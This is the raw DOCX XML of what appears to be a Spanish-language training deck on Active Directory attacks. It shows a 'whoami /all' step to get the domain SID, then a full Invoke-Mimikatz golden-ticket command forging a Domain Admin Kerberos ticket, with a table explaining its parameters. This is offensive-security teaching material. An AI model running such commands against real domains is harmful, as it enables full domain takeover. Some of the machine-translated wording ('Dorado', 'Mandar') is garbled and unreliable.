    <w:p w14:paraId="4F11E9F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D49541D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="101"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012CD3E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SID de dominio :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9DFAB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E96770A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="16"/>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10720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D24ADAA" wp14:editId="03275F67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4658867</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>185630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3459479" cy="525780"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9479" cy="525780"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="125616C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64"/>
                              <w:ind w:left="304"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>whoami</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /all (de un </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>usuario</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> de </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>dominio</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7D24ADAA" id="Textbox 574" o:spid="_x0000_s1294" type="#_x0000_t202" style="position:absolute;margin-left:366.85pt;margin-top:14.6pt;width:272.4pt;height:41.4pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="125616C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64"/>
                        <w:ind w:left="304"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>whoami</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /all (de un </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>usuario</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>dominio</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61B0C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="235"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C6D6EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Boleto de oro de Adversary Forge en un dominio de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322FEA69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73408D57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7B4296" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B63143" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="94"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487711232" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1883A3A6" wp14:editId="0D29D7C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>544068</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>235039</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11055350" cy="1283335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0" cy="1283335"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="31C97428" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="111" w:line="376" w:lineRule="auto"/>
                              <w:ind w:left="175" w:right="132"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Invoke-mimikatz -command '"kerberos::golden /Usuario:Administrador /dominio:cyberwarfare.corp /sid:S-1- 5- 21-yyyy-zzzzzzzzzzzz-xxxxxx /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>target:enterprise-dc.cyberwarfare.corp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>service:cifs</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> /rc4:&lt;HASH&gt; /id:500</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1879EC57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="410" w:lineRule="exact"/>
                              <w:ind w:left="175"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1883A3A6" id="Textbox 575" o:spid="_x0000_s1295" type="#_x0000_t202" style="position:absolute;margin-left:42.85pt;margin-top:18.5pt;width:870.5pt;height:101.05pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="31C97428" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="111" w:line="376" w:lineRule="auto"/>
                        <w:ind w:left="175" w:right="132"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Invoke-mimikatz -command '"kerberos::golden /Usuario:Administrador /dominio:cyberwarfare.corp /sid:S-1- 5- 21-yyyy-zzzzzzzzzzzz-xxxxxx /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>target:enterprise-dc.cyberwarfare.corp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>service:cifs</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> /rc4:&lt;HASH&gt; /id:500</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1879EC57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="410" w:lineRule="exact"/>
                        <w:ind w:left="175"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8C96BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId290"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="820" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="165"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2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388"/>
        <w:gridCol w:w="7388"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="690809EB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="586"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="257F5109" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="55"/>
              <w:ind w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mandar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="20549C97" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="55"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Explicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="0BCEBF4B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="786"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="74717DFF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="50"/>
              <w:ind w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Kerberos::Dorado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="40FB829E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="35"/>
              <w:ind w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre del módulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="63B58485" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="806"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="158D5633" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Usuario:Administrador</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="6A308D9C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Nombre de usuario para el que se genera el TGT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="509AF330" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="781"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="45A9BCE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>dominio:ciberguerra.corp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="1BC0DAEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Dominio actual Nombre de dominio completo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="60DB2319" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="806"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7388" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="63704A68" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="71"/>
              <w:ind w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
